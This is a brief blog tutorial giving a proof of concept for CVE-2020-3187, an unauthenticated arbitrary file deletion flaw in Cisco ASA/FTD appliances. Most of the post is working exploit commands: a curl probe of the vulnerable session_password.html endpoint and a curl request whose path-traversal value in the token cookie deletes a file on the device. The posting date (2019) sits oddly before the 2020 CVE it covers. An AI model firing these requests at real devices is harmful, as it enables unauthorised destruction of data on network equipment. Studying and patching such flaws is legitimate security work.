Cve 2020 3187

Posted Aug 9, 2019 2019-08-09T00:00:00+02:00 by Ahmed Salah Abdalhfaz

title: POC of CVE-2020-3187 - unauthenticated arbitrary file deletion in Cisco ASA/FTD author: Elsfa7-110 categories: [Tutorial] tags: [CVE] pin: true —

If you found Cisco ASA / FTD

Well let’s apply CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

Vulnerable Endpoint

go to https://host/+CSCOE+/session_password.html

curl -k -s -i https://hotst/+CSCOE+/session_password.html

to delete logo file “/+CSCOU+/csco_logo.gif”.

curl -k -H “Cookie: token = .. / + CSCOU + / csco_logo.gif” https://host/+CSCOE+/session_password.html

This post is licensed under CC BY 4.0 by the author.

Cve 2020 3187

If you found Cisco ASA / FTD

Further Reading

Acknowledgements Hof

Customize The Favicon

Getting Started

Trending Tags